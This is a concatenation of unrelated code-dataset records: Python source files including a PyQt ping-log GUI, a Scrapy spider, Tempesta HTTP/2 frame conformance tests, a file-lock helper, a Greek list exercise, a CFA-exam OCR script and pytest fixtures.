# DOWN ip layout for ping logs
self.down_ip_layout = QVBoxLayout()
self.down_ip_btn = QtGui.QLabel("DOWN Nodes")
self.down_ip_btn.setFont(QtGui.QFont("Verdana", 10, QtGui.QFont.Bold))
self.down_ip_btn.setStyleSheet("QPushButton {background-color: white ;color:Red;border: 2px solid black}")
self.down_ip_layout.addWidget(self.down_ip_btn)
self.down_ip_btn.setToolTip("Please click here to open UP NODE file.. !")
self.down_ip_btn.setStyleSheet("""QToolTip { background-color: #00bfff; color: black; border: black solid 1px }""")
self.down_ip_textbox = QPlainTextEdit()
self.down_ip_textbox.setFont(QtGui.QFont("Verdana", 10, QtGui.QFont.Bold))
self.down_ip_textbox.setStyleSheet("background-color: rgb(250,210,210);color:rgb(118,14,16);border: 2px solid black; ")
self.down_ip_textbox.setReadOnly(True)
self.down_ip_layout.addWidget(self.down_ip_textbox)
self.progress_bar_layout.addLayout(self.secondary_progress_layout)
self.progress_bar_layout.addLayout(self.control_button_layout)
self.ping_log_layout.addLayout(self.up_ip_layout)
self.ping_log_layout.addLayout(self.down_ip_layout)
self.parent_layout.addLayout(self.ping_log_layout)
self.parent_layout.addLayout(self.progress_bar_layout)
self.progressBar = QtGui.QProgressBar()
self.progressLabel = QtGui.QLabel("Ping process is in progress .... Please wait until the log file is generated...!")
self.cancel_button = QtGui.QPushButton("Cancel")
# self.progressBar.setGeometry(QtCore.QRect(100, 645, 710, 17))
self.progressBar.setProperty("Current status", 0)
self.progressBar.setObjectName("progressBar")
self.progressBar.setMaximumHeight(15)
self.progressBar.setTextVisible(True)
self.progressBar.setValue(0)
self.progressBar.setRange(0,100)
self.progressLabel.setFont(QtGui.QFont("verdana", 9, QtGui.QFont.Normal))
self.secondary_progress_layout.addWidget(self.progressBar)
self.secondary_progress_layout.addWidget(self.progressLabel)
self.progress_bar_layout.addWidget(self.cancel_button)
# self.last_parent.msgBox.information(,'Job status!',"Ping logs process has been closed.!", QtGui.QMessageBox.Ok)
self.main_widget.setLayout(self.parent_layout)
self.last_parent.right_base_layout_v.addWidget(self.main_widget)
self.main_widget.hide()
def prepare_window(self,):
self.progressBar.show()
self.progressLabel.show()
self.cancel_button.show()
self.up_ip_textbox.clear()
self.down_ip_textbox.clear()
self.main_widget.show()
def closeEvent(self,event):
self.wind_close_flg = True
|
5,658 | 92e414c76f4c585092a356d7d2957e91c1477c5f | __version__ = "2.1.2"
default_app_config = "channels.apps.ChannelsConfig"
DEFAULT_CHANNEL_LAYER = "default"
|
5,659 | 8894b73829978cec29aab6ee8bf09700da7fb59f | #-*- coding: utf-8 -*-
import django
if django.get_version() <= '1.3.1':
import apps.settings as settings
from django.core.management import setup_environ
setup_environ(settings)
elif django.get_version() >= '1.7.0':
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "apps.settings")
django.setup()
elif django.get_version() >= '1.6.0': #ubuntu 14.04 used 1.6.?
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "apps.settings")
from django.conf import settings
import os
import os.path
import traceback
cur_dir = os.path.dirname(os.path.abspath(__file__))
LOGFILE = os.path.join(cur_dir,"logs","oneclick.log")
file_list = ['import_test', 'import_test_dev', 'import_test_local','settings', 'manage', 'settings_dev', 'manage_dev', 'settings_stg','manage_stg', 'settings_local','manage_local']
exclude_dir = ['.svn', 'realtime_pvp']
def run_dir(py_dir):
log_f = open(LOGFILE, 'a+')
try:
for root, dirs, files in os.walk(py_dir):
if os.path.basename(root) not in exclude_dir:
for f in files:
name, ext = os.path.splitext(f)
if ext == '.py' and name not in file_list:
root = root.replace(py_dir, '').replace('/', '.').replace('\\', '.')
print root, name
log_f.write(str(root) + str(name) + '\n')
if root:
__import__('apps.' + root, globals(), locals(), [name], -1)
else:
__import__('apps.' + name, globals(), locals(), [], -1)
log_f.close()
except:
err_info = traceback.format_exc()
print err_info
log_f.write(err_info+ '\n')
log_f.close()
if __name__ == '__main__':
run_dir(settings.BASE_ROOT+'/apps/')
|
5,660 | d307c3479e34a12971f62a765aca2ba0850d80d1 | import scrapy
import datetime
from tzscrape.items import CitizenItem
class CitizenSpider(scrapy.Spider):
name = 'citizen'
allowed_domains = ['thecitizen.co.tz']
start_urls = ['http://www.thecitizen.co.tz/']
def parse(self, response):
# headlines
for href in response.xpath('//*[@itemprop="headline"]/a/@href'):
url = response.urljoin(href.extract())
yield scrapy.Request(url, callback=self.parse_article)
#teasers
for href in response.css('li.story-teaser').xpath('a/@href[1]'):
url = response.urljoin(href.extract())
yield scrapy.Request(url, callback=self.parse_article)
def parse_article(self, response):
item = CitizenItem()
item['body'] = response.xpath('//div[@itemprop="articleBody"]/div/p//text()').extract()
if not item['body']:
yield None
else :
item['url'] = response.url
item['publication'] = 'citizen'
item['title'] = response.css('h1').xpath('text()').extract()
item['byline'] = response.css('section.author').xpath('text()').extract()
item['scraped_at'] = datetime.datetime.utcnow().isoformat()
yield item |
5,661 | e474cb3db74b5344bd861aacf779cb9f77830ef6 | """Functional tests for h2 frames."""
__author__ = "Tempesta Technologies, Inc."
__copyright__ = "Copyright (C) 2023 Tempesta Technologies, Inc."
__license__ = "GPL2"
from h2.errors import ErrorCodes
from h2.exceptions import StreamClosedError
from framework import deproxy_client, tester
from helpers import checks_for_tests as checks
from http2_general.helpers import H2Base
from helpers.networker import NetWorker
from hpack import HeaderTuple
class TestH2Frame(H2Base):
def test_data_framing(self):
"""Send many 1 byte frames in request."""
self.start_all_services()
deproxy_cl = self.get_client("deproxy")
deproxy_cl.parsing = False
request_body = "x" * 100
deproxy_cl.make_request(request=self.post_request, end_stream=False)
for byte in request_body[:-1]:
deproxy_cl.make_request(request=byte, end_stream=False)
deproxy_cl.make_request(request=request_body[-1], end_stream=True)
self.__assert_test(client=deproxy_cl, request_body=request_body, request_number=1)
def test_empty_last_data_frame(self):
"""
Send request with empty last data frame. It is valid request. RFC 9113 6.9.1.
"""
self.start_all_services()
deproxy_cl = self.get_client("deproxy")
deproxy_cl.parsing = False
request_body = "123"
deproxy_cl.make_request(request=self.post_request, end_stream=False)
deproxy_cl.make_request(request=request_body, end_stream=False)
deproxy_cl.make_request(request="", end_stream=True)
self.__assert_test(client=deproxy_cl, request_body=request_body, request_number=1)
def test_empty_data_frame(self):
"""
Send request with empty data frame. It is valid request. RFC 9113 10.5.
"""
self.start_all_services()
deproxy_cl = self.get_client("deproxy")
deproxy_cl.parsing = False
request_body = "123"
deproxy_cl.make_request(request=self.post_request, end_stream=False)
deproxy_cl.make_request(request="", end_stream=False)
deproxy_cl.make_request(request=request_body, end_stream=True)
self.__assert_test(client=deproxy_cl, request_body=request_body, request_number=1)
def test_settings_frame(self):
"""
Create tls connection and send preamble + correct settings frame.
Tempesta must accept settings and return settings + ack settings frames.
Then client send ack settings frame and Tempesta must correctly accept it.
"""
self.start_all_services(client=True)
client: deproxy_client.DeproxyClientH2 = self.get_client("deproxy")
# initiate_connection() generates preamble + settings frame with default variables
self.initiate_h2_connection(client)
# send empty setting frame with ack flag.
client.send_bytes(client.h2_connection.data_to_send())
client.h2_connection.clear_outbound_data_buffer()
# send header frame after exchanging settings and make sure
# that connection is open.
client.send_request(self.post_request, "200")
def test_window_update_frame(self):
"""Tempesta must handle WindowUpdate frame."""
self.start_all_services(client=True)
client: deproxy_client.DeproxyClientH2 = self.get_client("deproxy")
# add preamble + settings frame with SETTING_INITIAL_WINDOW_SIZE = 65535
client.update_initial_settings()
# send preamble + settings frame
client.send_bytes(client.h2_connection.data_to_send())
client.h2_connection.clear_outbound_data_buffer()
self.assertTrue(client.wait_for_ack_settings())
# send WindowUpdate frame with window size increment = 5000
client.h2_connection.increment_flow_control_window(5000)
client.send_bytes(client.h2_connection.data_to_send())
client.h2_connection.clear_outbound_data_buffer()
# send header frame after sending WindowUpdate and make sure
# that connection is working correctly.
client.send_request(self.get_request, "200")
self.assertFalse(client.connection_is_closed())
def test_continuation_frame(self):
"""Tempesta must handle CONTINUATION frame."""
self.start_all_services()
client: deproxy_client.DeproxyClientH2 = self.get_client("deproxy")
client.update_initial_settings()
client.send_bytes(client.h2_connection.data_to_send())
client.h2_connection.clear_outbound_data_buffer()
# H2Connection separates headers to HEADERS + CONTINUATION frames
# if they are larger than 16384 bytes
client.send_request(
request=self.get_request + [("qwerty", "x" * 5000) for _ in range(4)],
expected_status_code="200",
)
self.assertFalse(client.connection_is_closed())
def test_rst_frame_in_request(self):
"""
Tempesta must handle RST_STREAM frame and close stream but other streams MUST work.
"""
client = self.get_client("deproxy")
self.start_all_services()
self.initiate_h2_connection(client)
# client opens streams with id 1, 3 and does not close them
client.make_request(request=self.post_request, end_stream=False)
client.stream_id = 3
client.make_request(request=self.post_request, end_stream=False)
# client send RST_STREAM frame with NO_ERROR code in stream 1 and
# Tempesta closes it for itself.
client.h2_connection.reset_stream(stream_id=1, error_code=0)
client.send_bytes(client.h2_connection.data_to_send())
# Client send DATA frame in stream 3 and it MUST receive response
client.send_request("qwe", "200")
# Tempesta allows creating new streams.
client.stream_id = 5
client.send_request(self.post_request, "200")
self.assertFalse(
client.connection_is_closed(), "Tempesta closed connection after receiving RST_STREAM."
)
def test_rst_frame_in_response(self):
"""
When Tempesta returns RST_STREAM:
- open streams must not be closed;
- new streams must be accepted.
"""
client = self.get_client("deproxy")
client.parsing = False
self.start_all_services()
self.initiate_h2_connection(client)
# client opens stream with id 1 and does not close it
client.make_request(request=self.post_request, end_stream=False)
# client send invalid request and Tempesta returns RST_STREAM
stream_with_rst = 3
client.stream_id = stream_with_rst
client.send_request(self.get_request + [("x-forwarded-for", "1.1.1.1.1.1")], "400")
# client open new stream
client.make_request(self.get_request, end_stream=True)
client.wait_for_response(3)
# client send DATA frame in stream 1 and it must be open.
client.stream_id = 1
client.make_request("body", end_stream=True)
client.wait_for_response(3)
self.assertRaises(
StreamClosedError, client.h2_connection._get_stream_by_id, stream_with_rst
)
self.assertFalse(
client.connection_is_closed(), "Tempesta closed connection after sending RST_STREAM."
)
def test_rst_stream_with_id_0(self):
"""
RST_STREAM frames MUST be associated with a stream. If a RST_STREAM frame
is received with a stream identifier of 0x00, the recipient MUST treat this
as a connection error (Section 5.4.1) of type PROTOCOL_ERROR.
RFC 9113 6.4
"""
client = self.get_client("deproxy")
self.start_all_services()
self.initiate_h2_connection(client)
# send RST_STREAM with id 0
client.send_bytes(b"\x00\x00\x04\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00")
self.assertTrue(
client.wait_for_connection_close(1),
"Tempesta did not close connection after receiving RST_STREAM with id 0.",
)
self.assertIn(ErrorCodes.PROTOCOL_ERROR, client.error_codes)
def test_goaway_frame_in_response(self):
"""
Tempesta must:
- close all streams for connection error (GOAWAY);
- return last_stream_id.
There is an inherent race condition between an endpoint starting new streams
and the remote peer sending a GOAWAY frame. To deal with this case, the GOAWAY
contains the stream identifier of the last peer-initiated stream that was or
might be processed on the sending endpoint in this connection. For instance,
if the server sends a GOAWAY frame, the identified stream is the highest-numbered
stream initiated by the client.
RFC 9113 6.8
"""
client = self.get_client("deproxy")
self.start_all_services()
self.initiate_h2_connection(client)
# Client opens many streams and does not close them
for stream_id in range(1, 6, 2):
client.stream_id = stream_id
client.make_request(request=self.post_request, end_stream=False)
# Client send DATA frame with stream id 0.
# Tempesta MUST return GOAWAY frame with PROTOCOL_ERROR
client.send_bytes(b"\x00\x00\x03\x00\x01\x00\x00\x00\x00asd")
self.assertTrue(client.wait_for_connection_close(3), "Tempesta did not send GOAWAY frame.")
self.assertIn(ErrorCodes.PROTOCOL_ERROR, client.error_codes)
self.assertEqual(
client.last_stream_id,
stream_id,
"Tempesta returned invalid last_stream_id in GOAWAY frame.",
)
def test_goaway_frame_in_request(self):
"""
Tempesta must not close connection after receiving GOAWAY frame.
GOAWAY allows an endpoint to gracefully stop accepting new streams while still
finishing processing of previously established streams.
RFC 9113 6.8
"""
client = self.get_client("deproxy")
self.start_all_services()
self.initiate_h2_connection(client)
# Client opens many streams and does not close them
for stream_id in range(1, 6, 2):
client.stream_id = stream_id
client.make_request(request=self.post_request, end_stream=False)
# Client send GOAWAY frame with PROTOCOL_ERROR as bytes
# because `_terminate_connection` method changes state machine to closed
client.send_bytes(b"\x00\x00\x08\x07\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x01")
# Client sends frames in already open streams.
# Tempesta must handle these frames and must not close streams,
# because sender closes connection, but not receiver.
for stream_id in range(1, 6, 2):
client.stream_id = stream_id
client.make_request(request="asd", end_stream=True)
self.assertTrue(
client.wait_for_response(), "Tempesta closed connection after receiving GOAWAY frame."
)
def test_double_header_frame_in_single_stream(self):
client = self.get_client("deproxy")
self.start_all_services()
self.initiate_h2_connection(client)
client.make_request(self.post_request, end_stream=False)
client.make_request([("header1", "header value1")], end_stream=True)
self.assertTrue(client.wait_for_connection_close())
self.assertIn(ErrorCodes.PROTOCOL_ERROR, client.error_codes)
def __assert_test(self, client, request_body: str, request_number: int):
server = self.get_server("deproxy")
self.assertTrue(client.wait_for_response(timeout=5))
self.assertEqual(client.last_response.status, "200")
self.assertEqual(len(server.requests), request_number)
checks.check_tempesta_request_and_response_stats(
tempesta=self.get_tempesta(),
cl_msg_received=request_number,
cl_msg_forwarded=request_number,
srv_msg_received=request_number,
srv_msg_forwarded=request_number,
)
error_msg = "Malformed request from Tempesta."
self.assertEqual(server.last_request.method, self.post_request[3][1], error_msg)
self.assertEqual(server.last_request.headers["host"], self.post_request[0][1], error_msg)
self.assertEqual(server.last_request.uri, self.post_request[1][1], error_msg)
self.assertEqual(server.last_request.body, request_body)
class TestH2FrameEnabledDisabledTsoGroGsoBase(H2Base):
def setup_tests(self):
self.start_all_services()
client = self.get_client("deproxy")
server = self.get_server("deproxy")
client.update_initial_settings(header_table_size=512)
client.send_bytes(client.h2_connection.data_to_send())
client.wait_for_ack_settings()
return client, server
DEFAULT_MTU = 1500
class TestH2FrameEnabledDisabledTsoGroGso(TestH2FrameEnabledDisabledTsoGroGsoBase, NetWorker):
def test_headers_frame_with_continuation(self):
client, server = self.setup_tests()
self.run_test_tso_gro_gso_disabled(
client, server, self._test_headers_frame_with_continuation, DEFAULT_MTU
)
self.run_test_tso_gro_gso_enabled(
client, server, self._test_headers_frame_with_continuation, DEFAULT_MTU
)
def test_headers_frame_without_continuation(self):
client, server = self.setup_tests()
self.run_test_tso_gro_gso_disabled(
client, server, self._test_headers_frame_without_continuation, DEFAULT_MTU
)
self.run_test_tso_gro_gso_enabled(
client, server, self._test_headers_frame_without_continuation, DEFAULT_MTU
)
def test_data_frame(self):
client, server = self.setup_tests()
self.run_test_tso_gro_gso_disabled(client, server, self._test_data_frame, DEFAULT_MTU)
self.run_test_tso_gro_gso_enabled(client, server, self._test_data_frame, DEFAULT_MTU)
def test_headers_frame_for_local_resp_invalid_req_d(self):
client, server = self.setup_tests()
self.run_test_tso_gro_gso_disabled(
client, server, self._test_headers_frame_for_local_resp_invalid_req, DEFAULT_MTU
)
def test_headers_frame_for_local_resp_invalid_req_e(self):
client, server = self.setup_tests()
self.run_test_tso_gro_gso_enabled(
client, server, self._test_headers_frame_for_local_resp_invalid_req, DEFAULT_MTU
)
def _test_headers_frame_for_local_resp_invalid_req(self, client, server):
client.send_request(
request=[
HeaderTuple(":authority", "bad.com"),
HeaderTuple(":path", "/"),
HeaderTuple(":scheme", "https"),
HeaderTuple(":method", "GET"),
],
expected_status_code="403",
)
def _test_data_frame(self, client, server):
self._test_headers_data_frames(client, server, 50000, 100000)
def _test_headers_frame_with_continuation(self, client, server):
self._test_headers_data_frames(client, server, 50000, 0)
def _test_headers_frame_without_continuation(self, client, server):
self._test_headers_data_frames(client, server, 1000, 0)
def _test_headers_data_frames(self, client, server, header_len, body_len):
header = ("qwerty", "x" * header_len)
server.set_response(
"HTTP/1.1 200 OK\r\n" + "Date: test\r\n" + "Server: debian\r\n"
f"{header[0]}: {header[1]}\r\n"
+ f"Content-Length: {body_len}\r\n\r\n"
+ ("x" * body_len)
)
client.make_request(self.post_request)
client.wait_for_response(5)
self.assertFalse(client.connection_is_closed())
self.assertEqual(client.last_response.status, "200", "Status code mismatch.")
self.assertIsNotNone(client.last_response.headers.get(header[0]))
self.assertEqual(len(client.last_response.headers.get(header[0])), len(header[1]))
self.assertEqual(
len(client.last_response.body), body_len, "Tempesta did not return full response body."
)
class TestH2FrameEnabledDisabledTsoGroGsoStickyCookie(
TestH2FrameEnabledDisabledTsoGroGsoBase, NetWorker
):
tempesta = {
"config": """
listen 443 proto=h2;
srv_group default {
server ${server_ip}:8000;
}
vhost v_good {
proxy_pass default;
sticky {
sticky_sessions;
cookie enforce;
secret "f00)9eR59*_/22";
}
}
tls_certificate ${tempesta_workdir}/tempesta.crt;
tls_certificate_key ${tempesta_workdir}/tempesta.key;
tls_match_any_server_name;
cache 1;
cache_fulfill * *;
block_action attack reply;
block_action error reply;
http_chain {
host == "bad.com" -> block;
host == "example.com" -> v_good;
}
"""
}
def test_headers_frame_for_local_resp_sticky_cookie_short(self):
client, server = self.setup_tests()
self.run_test_tso_gro_gso_disabled(
client, server, self._test_headers_frame_for_local_resp_sticky_cookie_short, DEFAULT_MTU
)
self.run_test_tso_gro_gso_enabled(
client, server, self._test_headers_frame_for_local_resp_sticky_cookie_short, DEFAULT_MTU
)
def test_headers_frame_for_local_resp_sticky_cookie_long(self):
client, server = self.setup_tests()
self.run_test_tso_gro_gso_disabled(
client, server, self._test_headers_frame_for_local_resp_sticky_cookie_long, DEFAULT_MTU
)
self.run_test_tso_gro_gso_enabled(
client, server, self._test_headers_frame_for_local_resp_sticky_cookie_long, DEFAULT_MTU
)
def _test_headers_frame_for_local_resp_sticky_cookie_short(self, client, server):
self._test_headers_frame_for_local_resp_sticky_cookie(client, server, 1000, 0)
def _test_headers_frame_for_local_resp_sticky_cookie_long(self, client, server):
self._test_headers_frame_for_local_resp_sticky_cookie(client, server, 50000, 50000)
def _test_headers_frame_for_local_resp_sticky_cookie(
self, client, server, header_len, body_len
):
header = ("qwerty", "x" * header_len)
server.set_response(
"HTTP/1.1 200 OK\r\n" + "Date: test\r\n" + "Server: debian\r\n"
f"{header[0]}: {header[1]}\r\n"
+ f"Content-Length: {body_len}\r\n\r\n"
+ ("x" * body_len)
)
client.send_request(request=self.post_request, expected_status_code="302")
self.post_request.append(HeaderTuple("Cookie", client.last_response.headers["set-cookie"]))
client.send_request(request=self.post_request, expected_status_code="200")
self.post_request.pop()
class TestH2FrameEnabledDisabledTsoGroGsoCache(TestH2FrameEnabledDisabledTsoGroGsoBase, NetWorker):
tempesta = {
"config": """
listen 443 proto=h2;
srv_group default {
server ${server_ip}:8000;
}
vhost v_good {
proxy_pass default;
}
tls_certificate ${tempesta_workdir}/tempesta.crt;
tls_certificate_key ${tempesta_workdir}/tempesta.key;
tls_match_any_server_name;
cache 1;
cache_fulfill * *;
cache_methods GET;
block_action attack reply;
block_action error reply;
http_chain {
host == "bad.com" -> block;
host == "example.com" -> v_good;
}
"""
}
def test_headers_frame_for_local_resp_cache_304_short(self):
client, server = self.setup_tests()
self.run_test_tso_gro_gso_disabled(
client, server, self._test_headers_frame_for_local_resp_cache_304_short, DEFAULT_MTU
)
self.run_test_tso_gro_gso_enabled(
client, server, self._test_headers_frame_for_local_resp_cache_304_short, DEFAULT_MTU
)
def test_headers_frame_for_local_resp_cache_200_short(self):
client, server = self.setup_tests()
self.run_test_tso_gro_gso_disabled(
client, server, self._test_headers_frame_for_local_resp_cache_200_short, DEFAULT_MTU
)
self.run_test_tso_gro_gso_enabled(
client, server, self._test_headers_frame_for_local_resp_cache_200_short, DEFAULT_MTU
)
def test_headers_frame_for_local_resp_cache_304_long(self):
client, server = self.setup_tests()
self.run_test_tso_gro_gso_disabled(
client, server, self._test_headers_frame_for_local_resp_cache_304_long, DEFAULT_MTU
)
self.run_test_tso_gro_gso_enabled(
client, server, self._test_headers_frame_for_local_resp_cache_304_long, DEFAULT_MTU
)
def test_headers_frame_for_local_resp_cache_200_long(self):
client, server = self.setup_tests()
self.run_test_tso_gro_gso_disabled(
client, server, self._test_headers_frame_for_local_resp_cache_200_long, DEFAULT_MTU
)
self.run_test_tso_gro_gso_enabled(
client, server, self._test_headers_frame_for_local_resp_cache_200_long, DEFAULT_MTU
)
def _test_headers_frame_for_local_resp_cache_304_short(self, client, server):
self._test_headers_frame_for_local_resp_cache(
client, server, 1000, 0, "Mon, 12 Dec 2024 13:59:39 GMT", "304"
)
def _test_headers_frame_for_local_resp_cache_200_short(self, client, server):
self._test_headers_frame_for_local_resp_cache(
client, server, 1000, 0, "Mon, 12 Dec 2020 13:59:39 GMT", "200"
)
def _test_headers_frame_for_local_resp_cache_304_long(self, client, server):
self._test_headers_frame_for_local_resp_cache(
client, server, 50000, 100000, "Mon, 12 Dec 2024 13:59:39 GMT", "304"
)
def _test_headers_frame_for_local_resp_cache_200_long(self, client, server):
self._test_headers_frame_for_local_resp_cache(
client, server, 50000, 100000, "Mon, 12 Dec 2020 13:59:39 GMT", "200"
)
def _test_headers_frame_for_local_resp_cache(
self, client, server, header_len, body_len, date, status_code
):
header = ("qwerty", "x" * header_len)
server.set_response(
"HTTP/1.1 200 OK\r\n" + "Date: test\r\n" + "Server: debian\r\n"
f"{header[0]}: {header[1]}\r\n"
+ f"Content-Length: {body_len}\r\n\r\n"
+ ("x" * body_len)
)
headers = [
HeaderTuple(":authority", "example.com"),
HeaderTuple(":path", "/"),
HeaderTuple(":scheme", "https"),
HeaderTuple(":method", "GET"),
]
client.send_request(request=headers, expected_status_code="200")
headers.append(HeaderTuple("if-modified-since", date))
client.send_request(request=headers, expected_status_code=status_code)
|
5,662 | 90ae14d8af163343520365a5565a7c44de57059d | """
"""
import os
from alert_triage.util import filelock
MODIFIED_ALERTS_FILE = "/tmp/alert_triage_modified_alerts"
def read_modified_alert_ids():
""" Read modified alert IDs from file, then remove them from the file."""
# Return an empty list if the file doesn't exist.
if not os.path.exists(MODIFIED_ALERTS_FILE):
return []
# Get a lock on the file
lock = filelock.FileLock(MODIFIED_ALERTS_FILE, 5)
lock.acquire()
# Open the file and read in the data.
fp = open(MODIFIED_ALERTS_FILE, "r+")
ids = fp.read().split("\n")
# remove zero length strings
ids = filter(len, ids)
# convert IDs to int
ids = list(map(int, ids))
# remove duplicates
ids = list(set(ids))
# close and remove the file
fp.close()
#TODO: uncomment when live
#os.unlink(MODIFIED_ALERTS_FILE)
# Release the lock.
lock.release()
return ids
def write_modified_alert_ids(ids):
# Get a lock on the file
lock = filelock.FileLock(MODIFIED_ALERTS_FILE, 5)
lock.acquire()
# Open the file and write the alert IDs.
fp = open(MODIFIED_ALERTS_FILE, "a")
for alert_id in ids:
fp.write(str(alert_id) + "\n")
fp.close()
# Release the lock.
lock.release()
|
5,663 | e5a7b0cbc82b57578f6dcbf676e8f589c6e9ac1b | __author__ = 'mvoronin'
|
5,664 | 87bcf53d1c93645a08b10ba0d02edf0d5b0a4906 | #Άσκηση 3.2: Ουρά δύο άκρων
print("Οδηγίες: Το πρόγραμμα καταχωρει αριθμους σε μια λίστα! Τρέχει σε άπειρο βρόχο, έως ότου πληκτρολογήσεις 'q'. \nΑν θελήσεις να βγάλεις το πρώτο στοιχείο της λίστας, πληκτρολόγησε '0r' ενώ,\nαν θέλεις να βγάλεις το τελευταιο, πληκτρολόγησε 'r'\n ")
newNumber = input("Για να ξεκινήσεις, πάτησε Enter \n")
alist = []
check = True
while check == True :
newNumber = input("Δώσε μου τη καταχώρηση σου: ")
if newNumber != 'q' and newNumber != 'r' and newNumber != '0r' :
if newNumber[0] != '0' :
alist.append(float(newNumber))
check = True
else :
numberToList = list(newNumber)
numberToList.pop(0)
listToNumber = ''.join(numberToList)
alist.insert(0, float(listToNumber))
check = True
print(alist)
elif newNumber == 'r':
print("\n*****Από τη λίστα βγήκε το τελευταίο στοιχειο*****", alist[(len(alist) - 1)])
alist.pop((len(alist))-1)
print(alist)
check = True
elif newNumber == '0r' :
print("\n*****Από τη λίστα βγήκε το πρώτο στοιχειο*****", alist[0])
alist.pop(0)
print(alist)
check = True
else:
print("\nΤέλος εφαρμογής!")
check = False
#παρατηρήσεις :
#1) Στο πρόγραμμα δεν έχει μπει κάποιος έλεγχος για την εισοδο του χρήστη κι έτσι αν πληκτρολογήσει κάτι εκτος από αριθμό ή 'q' / 'r' / '0r' το πρόγραμμα σκάει
#2) Ο έλεγχος με το 'r', '0r' έγινε εκτός της πρώτης εισόδου για να συμπεριλάβουμε τη περίπτωση που η λίστα ειναι κενή. Αντίστοιχα η εκτέλεση του προγραμματος
#θα βγάλει σφάλμα αν παω να αφαιρέσω και το τελευταιο στοιχειο της λίστας και πατήσω 'r' ή '0r'
|
5,665 | ab3d443c60ca8ee82f594ae04e9b485a53d53f36 | from ocr_helpers import FilePathResolver, ProblemsWriter
from ocr_google_client import CfaProblemsBuilder
from ocr_google_client_2016 import ParserTwoThousandSixteenAnswers, ParserTwoThousandSixteenQuestions
def resolve_build_and_write(year, day_part, file_part, nb_blocks_footer=0, nb_words_footer=0, headers=None, skip_nb_page=0, parser=None, indentation_threshold=15):
resolver = FilePathResolver(year, day_part, file_part)
jpeg_filepaths = resolver.resolve_sorted_paths()
jpeg_filepaths = jpeg_filepaths[skip_nb_page:]
builder = CfaProblemsBuilder(parser=parser, headers=headers, nb_blocks_footer=nb_blocks_footer, nb_words_footer=nb_words_footer, indentation_threshold=indentation_threshold)
problems = builder.build_problems(jpeg_filepaths)
writer = ProblemsWriter()
writer.write_problems(resolver.get_xml_result_file(), problems)
# 2014 afternoon
# headers = ["7476229133318632 March Mock Exam - PM March Mock Exam - PM 399388"]
# resolve_build_and_write('2014', 'afternoon', 'answer', nb_blocks_footer=1, headers=headers, indentation_threshold=25)
# 2014 morning
# base_header = '3172168919041893 March Mock Exam - AM 399388'
# headers = ["|" + base_header, base_header]
# resolve_build_and_write('2014', 'morning', 'answer', nb_blocks_footer=1, headers=headers)
# 2015 afternoon
# headers = ['2015 Level I Mock Exam PM Questions and Answers']
# resolve_build_and_write('2015', 'afternoon', 'answer', nb_blocks_footer=1, headers=headers)
# 2015 morning
# headers = ['2015 Level I Mock Exam AM Questions and Answers']
# resolve_build_and_write('2015', 'morning', 'answer', nb_blocks_footer=1, headers=headers)
# 2016 afternoon answer
# headers = ['CFA level1-Mock-114']
# parser = ParserTwoThousandSixteenAnswers(17)
# resolve_build_and_write('2016', 'afternoon_answer', '', skip_nb_page=1, headers=headers, nb_words_footer=3, parser=parser)
# 2016 afternoon questions
# headers = ['CFA level1-Mock-114', 'CFA levell-Mock-114']
# parser = ParserTwoThousandSixteenQuestions(17)
# resolve_build_and_write('2016', 'afternoon_question', '', skip_nb_page=1, headers=headers, nb_words_footer=3, parser=parser)
#
# 2016 morning answer
# headers = ['CFA level1-Mock-113']
# parser = ParserTwoThousandSixteenAnswers(17)
# resolve_build_and_write('2016', 'morning_answer', '', skip_nb_page=1, headers=headers, nb_words_footer=3, parser=parser)
# 2016 afternoon questions
# headers = ['CFA level1-Mock-113', 'CFA levell-Mock-113']
# parser = ParserTwoThousandSixteenQuestions(17)
# resolve_build_and_write('2016', 'morning_question', '', skip_nb_page=1, headers=headers, nb_words_footer=3, parser=parser)
# 2017 afternoon
#resolve_build_and_write('2017', 'morning', 'answer', skip_nb_page=1, nb_blocks_footer=2)
# 2017 afternoon
resolve_build_and_write('2017', 'afternoon', 'answer', skip_nb_page=1, nb_blocks_footer=2)
|
5,666 | 6d2bc28e7742f1063a04ae96fc195515ad70598b | from django.shortcuts import render
class Person(object):
def __init__(self,username):
self.username = username
def index(request):
# p = Person("张三")
# context = {
# 'person': p
# }
# context = {
# 'person': {
# 'username':'zhiliao',
# }
# }
# person.keys()
context = {
'persons': (
'鲁班一号',
'程咬金',
'阿珂'
)
}
return render(request,'index.html',context=context) |
5,667 | eb1737ac671129ed3459ce4feacb81d414eef371 | # -*- coding: utf-8 -*-
# Copyright European Organization for Nuclear Research (CERN) since 2012
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import traceback
import re
import functools
from os import environ
from random import choice
from string import ascii_uppercase
import pytest
_del_test_prefix = functools.partial(re.compile(r'^[Tt][Ee][Ss][Tt]_?').sub, '')
# local imports in the fixtures to make this file loadable in e.g. client tests
pytest_plugins = ('tests.ruciopytest.artifacts_plugin', )
def pytest_configure(config):
config.addinivalue_line('markers', 'dirty: marks test as dirty, i.e. tests are leaving structures behind')
config.addinivalue_line('markers', 'noparallel(reason, groups): marks test being unable to run in parallel to other tests' )
if config.pluginmanager.hasplugin("xdist"):
from .ruciopytest import xdist_noparallel_scheduler
config.pluginmanager.register(xdist_noparallel_scheduler)
def pytest_make_parametrize_id(config, val, argname):
if argname == 'file_config_mock':
cfg = {}
for section, option, value in val['overrides']:
cfg.setdefault(section, {})[option] = value
return argname + str(cfg)
if argname == 'core_config_mock':
cfg = {}
for section, option, value in val['table_content']:
cfg.setdefault(section, {})[option] = value
return argname + str(cfg)
# return None to let pytest handle the formatting
return None
@pytest.fixture(scope='session')
def session_scope_prefix():
"""
Generate a name prefix to be shared by objects created during this pytest session
"""
return ''.join(choice(ascii_uppercase) for _ in range(6)) + '-'
@pytest.fixture(scope='module')
def module_scope_prefix(request, session_scope_prefix):
"""
Generate a name prefix to be shared by objects created during this pytest module
Relies on pytest's builtin fixture "request"
https://docs.pytest.org/en/6.2.x/reference.html#std-fixture-request
"""
